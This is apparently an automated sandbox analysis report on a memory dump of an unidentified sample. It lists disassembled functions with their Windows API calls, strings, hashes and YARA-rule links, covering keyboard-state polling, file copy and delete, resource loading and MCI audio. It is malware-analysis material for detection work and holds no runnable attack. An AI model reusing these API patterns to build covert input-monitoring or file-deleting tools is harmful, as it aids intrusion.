String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 2116804098-2391861430
Opcode ID: 2bce8b7b1ccc8fdaef271767871697372c35d386536349e63abe3f13436fc731
Instruction ID: f7a553eead2600e8a7ce7b46eafa79ee002b4ed3ea73265adf21f1fd78a99898
Opcode Fuzzy Hash: 2bce8b7b1ccc8fdaef271767871697372c35d386536349e63abe3f13436fc731
Instruction Fuzzy Hash: 1A519471D00209BACF55FBA0DD42EEEB77AAF04301F10416AF109B22A1EB755F58DBA5

Function 006DD338 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 140COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 006DD37F

Part of subcall function 0069CAEE: _memmove.LIBCMT ref: 0069CB2F

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 006DD3A0
__swprintf.LIBCMT ref: 006DD3F3
_wprintf.LIBCMT ref: 006DD499
_wprintf.LIBCMT ref: 006DD4B7

Strings

^ ERROR , xrefs: 006DD432
Line %d (File "%s"):, xrefs: 006DD3ED
"%s" (%d) : ==> %s:, xrefs: 006DD4B2
"%s" (%d) : ==> %s:%s%s, xrefs: 006DD494
Error: , xrefs: 006DD463

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: LoadString_wprintf$__swprintf_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 2116804098-3420473620
Opcode ID: 0083582ec3c9c54f3cb106c64b4a3089626740d4f045f61d6820955dfd1e868a
Instruction ID: 9ef15f97ab6f51e1bcc489c2614f203d7f63a5a6615da55270a9fd92277b568f
Opcode Fuzzy Hash: 0083582ec3c9c54f3cb106c64b4a3089626740d4f045f61d6820955dfd1e868a
Instruction Fuzzy Hash: 7F51C771D00209ABCF55FBA0DD42EEEB7BAAF04701F10805AF105B22A1EB756F58CB65

Function 006D7212 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 107windowCOMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 006D7226
__swprintf.LIBCMT ref: 006D7233

Part of subcall function 006B234B: __woutput_l.LIBCMT ref: 006B23A4

FindResourceW.KERNEL32(?,?,0000000E), ref: 006D725D
LoadResource.KERNEL32(?,00000000), ref: 006D7269
LockResource.KERNEL32(00000000), ref: 006D7276
FindResourceW.KERNEL32(?,?,00000003), ref: 006D7296
LoadResource.KERNEL32(?,00000000), ref: 006D72A8
SizeofResource.KERNEL32(?,00000000), ref: 006D72B7
LockResource.KERNEL32(?), ref: 006D72C3
CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 006D7322

Strings

L6t, xrefs: 006D721F

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
String ID: L6t
API String ID: 1433390588-1488292326
Opcode ID: 999672fb234e9f57deac6f7ff5e998e29e10f84ad558ee6ea942e78427e62269
Instruction ID: 46fa6f614e3e62f670d00f6945e26cdc0f732a3005ea075ee82147d419436652
Opcode Fuzzy Hash: 999672fb234e9f57deac6f7ff5e998e29e10f84ad558ee6ea942e78427e62269
Instruction Fuzzy Hash: 8B31B0B190425AABDB119F61DC84AEF7BAAFF08301F008426FD15D2290F778DA51DBA5

Function 006D83D6 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON

Download Yara Rule

APIs

Part of subcall function 00697E53: _memmove.LIBCMT ref: 00697EB9

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 006D843F
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 006D8455
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 006D8466
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 006D8478
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 006D8489

Strings

status PlayMe mode, xrefs: 006D843A
open , xrefs: 006D83EE
play PlayMe, xrefs: 006D8484
close PlayMe, xrefs: 006D8450, 006D847D
alias PlayMe, xrefs: 006D8418
play PlayMe wait, xrefs: 006D8473

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: SendString$_memmove
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2279737902-1007645807
Opcode ID: f917f1ba721a6c083bc75bc855c0b5c6f7f25553d590063a68cfce497db2c85f
Instruction ID: dafb4f6499653e945c219920c7f0a67ffb8f96eb79e69f12f7e7e89e8151b1bd
Opcode Fuzzy Hash: f917f1ba721a6c083bc75bc855c0b5c6f7f25553d590063a68cfce497db2c85f
Instruction Fuzzy Hash: 1511C4A1A402697DDB20A7A1DC4ADFF7ABDEF91B00F04042EB411A31C0EFA04E05C5B0

Function 006D8097 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 006D809C

Part of subcall function 006AE3A5: timeGetTime.WINMM(?,7707B400,00706163), ref: 006AE3A9

Sleep.KERNEL32(0000000A), ref: 006D80C8
EnumThreadWindows.USER32(?,Function_0004804C,00000000), ref: 006D80EC
FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 006D810E
SetActiveWindow.USER32 ref: 006D812D
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 006D813B
SendMessageW.USER32(00000010,00000000,00000000), ref: 006D815A
Sleep.KERNEL32(000000FA), ref: 006D8165
IsWindow.USER32 ref: 006D8171
EndDialog.USER32(00000000), ref: 006D8182

Strings

BUTTON, xrefs: 006D8100

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: f4dc14b6cded531c59232f3fcbab8fc09ed015eded597945c804e5babdad25f5
Instruction ID: 06cc498a54b38b19ee0b38d26a32ce3e776a31715365e5889925a509380305bd
Opcode Fuzzy Hash: f4dc14b6cded531c59232f3fcbab8fc09ed015eded597945c804e5babdad25f5
Instruction Fuzzy Hash: E9219570640345BFE7225B65EC8DAB63B2BF7543C9B04C21AF401833B1CFBA4D099A19

Function 006DC890 Relevance: 18.3, APIs: 12, Instructions: 316fileCOMMON

Download Yara Rule

APIs

Part of subcall function 006DC6A0: __time64.LIBCMT ref: 006DC6AA

Part of subcall function 006941A7: _fseek.LIBCMT ref: 006941BF

__wsplitpath.LIBCMT ref: 006DC96F

Part of subcall function 006B297D: __wsplitpath_helper.LIBCMT ref: 006B29BD

_wcscpy.LIBCMT ref: 006DC982
_wcscat.LIBCMT ref: 006DC995
__wsplitpath.LIBCMT ref: 006DC9BA
_wcscat.LIBCMT ref: 006DC9D0
_wcscat.LIBCMT ref: 006DC9E3

Part of subcall function 006DC6E4: _memmove.LIBCMT ref: 006DC71D
Part of subcall function 006DC6E4: _memmove.LIBCMT ref: 006DC72C

_wcscmp.LIBCMT ref: 006DC92A

Part of subcall function 006DCE59: _wcscmp.LIBCMT ref: 006DCF49
Part of subcall function 006DCE59: _wcscmp.LIBCMT ref: 006DCF5C

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 006DCB8D
DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 006DCC24
CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 006DCC3A
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 006DCC4B
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 006DCC5D

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy
String ID:
API String ID: 152968663-0
Opcode ID: 533933623eb3052ac1d42147952604ad4fc043baaa0d1e10c60bf7d335588a91
Instruction ID: 3d7c47faf13390b3e991b5dc1a1ca92ee993f91013bfbd7dd174725eae71e5c3
Opcode Fuzzy Hash: 533933623eb3052ac1d42147952604ad4fc043baaa0d1e10c60bf7d335588a91
Instruction Fuzzy Hash: 60C11BB1D0012DAEDF50DF95CC81EEEB7BEAF59310F0040AAB609E6251DB709A85CF65

Function 006E08D9 Relevance: 18.2, APIs: 12, Instructions: 196COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006E090D
_memset.LIBCMT ref: 006E0928
CoInitialize.OLE32(00000000), ref: 006E093B
SHGetMalloc.SHELL32(?), ref: 006E0945
CoUninitialize.COMBASE ref: 006E094F
_wcscpy.LIBCMT ref: 006E0993
SHGetDesktopFolder.SHELL32(?), ref: 006E09F5
_wcscpy.LIBCMT ref: 006E0A1B
_wcscpy.LIBCMT ref: 006E0A77
SHBrowseForFolderW.SHELL32 ref: 006E0AA2
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 006E0AC5
CoUninitialize.COMBASE ref: 006E0B11

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: _wcscpy$FolderUninitialize_memset$BrowseDesktopFromInitializeListMallocPath
String ID:
API String ID: 3566271842-0
Opcode ID: 4e487c890a30a19384047061d9fe5cdf1446c96e4c36265c88b4758c2bbecd79
Instruction ID: 297b3292100fa2661ec8db41dec59066b912cbc1c3e259895bac4593006a79d3
Opcode Fuzzy Hash: 4e487c890a30a19384047061d9fe5cdf1446c96e4c36265c88b4758c2bbecd79
Instruction Fuzzy Hash: A4714F75901219AFDB10EFA5C884EDEB7B9FF49310F04809AE909AB252D774EE40CF94

Function 006D388D Relevance: 18.2, APIs: 12, Instructions: 185keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 006D3908
SetKeyboardState.USER32(?), ref: 006D3973
GetAsyncKeyState.USER32(000000A0), ref: 006D3993
GetKeyState.USER32(000000A0), ref: 006D39AA
GetAsyncKeyState.USER32(000000A1), ref: 006D39D9
GetKeyState.USER32(000000A1), ref: 006D39EA
GetAsyncKeyState.USER32(00000011), ref: 006D3A16
GetKeyState.USER32(00000011), ref: 006D3A24
GetAsyncKeyState.USER32(00000012), ref: 006D3A4D
GetKeyState.USER32(00000012), ref: 006D3A5B
GetAsyncKeyState.USER32(0000005B), ref: 006D3A84
GetKeyState.USER32(0000005B), ref: 006D3A92

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: fab03371770834829d39244e851ad3af84920e8cf5922c781aed02a9e6b2fafe
Instruction ID: e8d4e743fa4c92f39697f4282bf72c227915bb54b3369c4612402bd028932978
Opcode Fuzzy Hash: fab03371770834829d39244e851ad3af84920e8cf5922c781aed02a9e6b2fafe
Instruction Fuzzy Hash: 29519920E0479429FB35DBA488117EABFF65F01340F08859FD5C25A3C2DA649B8CC767

Function 006CFAFD Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 006CFB19
GetWindowRect.USER32(00000000,?), ref: 006CFB2B
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 006CFB89
GetDlgItem.USER32(?,00000002), ref: 006CFB94
GetWindowRect.USER32(00000000,?), ref: 006CFBA6
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 006CFBFC
GetDlgItem.USER32(?,000003E9), ref: 006CFC0A
GetWindowRect.USER32(00000000,?), ref: 006CFC1B
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 006CFC5E
GetDlgItem.USER32(?,000003EA), ref: 006CFC6C
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 006CFC89
InvalidateRect.USER32(?,00000000,00000001), ref: 006CFC96

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: c5146b7fac6b7bfa68ec2e38778f0b129b59b963595e6e4cd51455c75891bf61
Instruction ID: a9df2d6d8afa07b73cb6459874e1188b36bc28d9919c1c58218e799970933069
Opcode Fuzzy Hash: c5146b7fac6b7bfa68ec2e38778f0b129b59b963595e6e4cd51455c75891bf61
Instruction Fuzzy Hash: BA510C71B00209ABDB18CF69DD95FAEBBBAEB88350F14812DB919D72D0D7749D008B10

Function 006AB039 Relevance: 18.1, APIs: 12, Instructions: 131COMMON

Download Yara Rule

APIs

Part of subcall function 006AB155: GetWindowLongW.USER32(?,000000EB), ref: 006AB166

GetSysColor.USER32(0000000F), ref: 006AB067

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 4d2e919584c044d9434f3c94b96bbf9cd1d1416fe9e72ef76668378f0e040dba
Instruction ID: e2270af42127214f3a461184c88d3aac4717835c4dd71c617f60957715c0e64b
Opcode Fuzzy Hash: 4d2e919584c044d9434f3c94b96bbf9cd1d1416fe9e72ef76668378f0e040dba
Instruction Fuzzy Hash: 02418D31100544ABDB206F289888BFA3BA6AB06731F198365FD658A2E3D7758C42DF25

Function 006D7334 Relevance: 18.1, APIs: 12, Instructions: 113COMMON

Download Yara Rule

APIs

_wcschr.LIBCMT ref: 006D734C
_wcscpy.LIBCMT ref: 006D735D
__wsplitpath.LIBCMT ref: 006D7384
__wsplitpath.LIBCMT ref: 006D73A8
_wcscpy.LIBCMT ref: 006D73CA
_wcscpy.LIBCMT ref: 006D73E8
_wcscpy.LIBCMT ref: 006D73F9
_wcscat.LIBCMT ref: 006D7408
_wcscat.LIBCMT ref: 006D745D
_wcscat.LIBCMT ref: 006D7493
_wcscat.LIBCMT ref: 006D74A5

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
String ID:
API String ID: 136442275-0
Opcode ID: 21333ee1b8f5e7337f42c9bb477f7f7c2e7a5fa057bc4c8e4ba79f99bfeaeea0
Instruction ID: 2d608716836708668f90ededd845d3eba9de8e8b889f6ea840dd9f7bdb0f5af6
Opcode Fuzzy Hash: 21333ee1b8f5e7337f42c9bb477f7f7c2e7a5fa057bc4c8e4ba79f99bfeaeea0
Instruction Fuzzy Hash: EF412CB280412CAADB61EB50CC51EDE73BEAB08310F5041EBB519A2151EB30AFD4CFA5

Function 006984A6 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 145COMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 006984E5
__itow.LIBCMT ref: 00698519

Part of subcall function 006B2177: _xtow@16.LIBCMT ref: 006B2198

Strings

%.15g, xrefs: 006984DF
True, xrefs: 00705561
0x%p, xrefs: 00705582
False, xrefs: 00705568

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: __itow__swprintf_xtow@16
String ID: %.15g$0x%p$False$True
API String ID: 1502193981-2263619337
Opcode ID: 363c23d3ef5a6c82b67219f9471760467b156cd154d9d92f4332cb9374fea170
Instruction ID: 316aeb79f6a6b0a64721e5c511703ec1701fec3f0752f42cb355b090d3f52957
Opcode Fuzzy Hash: 363c23d3ef5a6c82b67219f9471760467b156cd154d9d92f4332cb9374fea170
Instruction Fuzzy Hash: ED41F3B1604605EFEF64DF78DC41EAA77EABF45310F20446EE54AC7292EA35DA81CB10

Function 006B5C91 Relevance: 16.8, APIs: 11, Instructions: 257COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006B5CCA

Part of subcall function 006B889E: __getptd_noexit.LIBCMT ref: 006B889E

__gmtime64_s.LIBCMT ref: 006B5D63
__gmtime64_s.LIBCMT ref: 006B5D99
__gmtime64_s.LIBCMT ref: 006B5DB6
__allrem.LIBCMT ref: 006B5E0C
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006B5E28
__allrem.LIBCMT ref: 006B5E3F
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006B5E5D
__allrem.LIBCMT ref: 006B5E74
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006B5E92
__invoke_watson.LIBCMT ref: 006B5F03

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: 44019df33dda40162e7ad5693cac5fdd13db5b94ac58de4e6029986730a9c23d
Instruction ID: 2cc83fad21e7805eb2059f046d28fa23c11d0d60e36993913d4c19d4e3dcdf40
Opcode Fuzzy Hash: 44019df33dda40162e7ad5693cac5fdd13db5b94ac58de4e6029986730a9c23d
Instruction Fuzzy Hash: 2F71D8F1A01B16ABD754AF68CC81BEA77ABEF04724F14412DF911D7781E770DA808B94

Function 006D57FB Relevance: 16.7, APIs: 11, Instructions: 189windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006D5816
GetMenuItemInfoW.USER32(007518F0,000000FF,00000000,00000030), ref: 006D5877
SetMenuItemInfoW.USER32(007518F0,00000004,00000000,00000030), ref: 006D58AD
Sleep.KERNEL32(000001F4), ref: 006D58BF
GetMenuItemCount.USER32(?), ref: 006D5903
GetMenuItemID.USER32(?,00000000), ref: 006D591F
GetMenuItemID.USER32(?,-00000001), ref: 006D5949
GetMenuItemID.USER32(?,?), ref: 006D598E
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 006D59D4
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 006D59E8
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 006D5A09

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
